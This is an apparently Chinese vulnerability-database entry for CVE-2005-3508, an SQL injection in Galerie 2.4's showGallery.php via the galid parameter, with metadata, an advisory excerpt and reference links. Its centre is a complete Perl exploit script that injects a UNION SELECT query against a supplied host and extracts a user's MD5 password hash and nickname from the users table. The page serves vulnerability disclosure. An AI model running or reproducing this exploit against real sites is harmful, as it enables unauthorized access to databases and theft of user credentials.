Galerie ShowGallery.PHP SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109205 漏洞类型 SQL注入
发布时间 2005-11-03 更新时间 2005-11-15
CVE编号 CVE-2005-3508 CNNVD-ID CNNVD-200511-137
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/26468
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200511-137
|漏洞详情
Gallery是一款在线图像管理工具。Gallery(Galerie)2.4的showGallery.php中的SQL注入漏洞,可让远程攻击者通过galid参数执行任意SQL命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/15313/info

Galerie is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.

Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. 

#!/bin/env perl
#------------------------------------------------------------#
#-      Warning :- (ABDUCTER) Behind U BY (ABDUCTER_MINDS@S4A.CC) OR (ABDUCTER_MINDS@YAHOO.COM)
#-      [!]     ==|| Gallery_v2.4 SQL Injection ||==
#-              Gr33tz :-
#-                      N0N0 (MY LOVE)
#-                      WWW.S4A.CC
#-                      Devil-00
#-                      FOR ALL ARABIAN COUNTRIES
#------------------------------------------------------------#
use LWP::Simple;

print "\n\n==========================================\n";
print "\n= Exploit for Gallery_v2.4                    ";
print "\n=   BY    |(ABDUCTER_MINDS[at]YAHOO.COM)|     ";
print "\n=             FOR ALL ARAB WWW.S4A.CC         ";
print "\n============================================\n\n";

if(!$ARGV[0] or !$ARGV[1]) {
  print "\n==|| Warning ABDUCTER Behind U ||==";
  print "\nUsage:\nperl $0 [host+script]\n\nExample:\nperl $0 http://tonioc.free.fr/gallery/ 1\n";
  exit(0);
}
$url = "/showGallery.php?galid=-1%20UNION%20SELECT%20id,null,null,passw,null,nick,null,null,null,null,nick,null%20FROM%20users%20WHERE%20id=$ARGV[1]/*";
$page = get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page =~ m/<SPAN class="strong"><b>(.*?)<\/b>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);
|参考资料

来源:BID
名称:15313
链接:http://www.securityfocus.com/bid/15313
来源:BUGTRAQ
名称:20051104Gallery_v2.4SQLInjection
链接:http://www.securityfocus.com/archive/1/archive/1/415806/30/0/threaded
来源:VUPEN
名称:ADV-2005-2309
链接:http://www.frsirt.com/english/advisories/2005/2309
来源:OSVDB
名称:20523
链接:http://www.osvdb.org/20523
来源:SECTRACK
名称:1015162
链接:http://securitytracker.com/id?1015162
来源:SECUNIA
名称:17453
链接:http://secunia.com/advisories/17453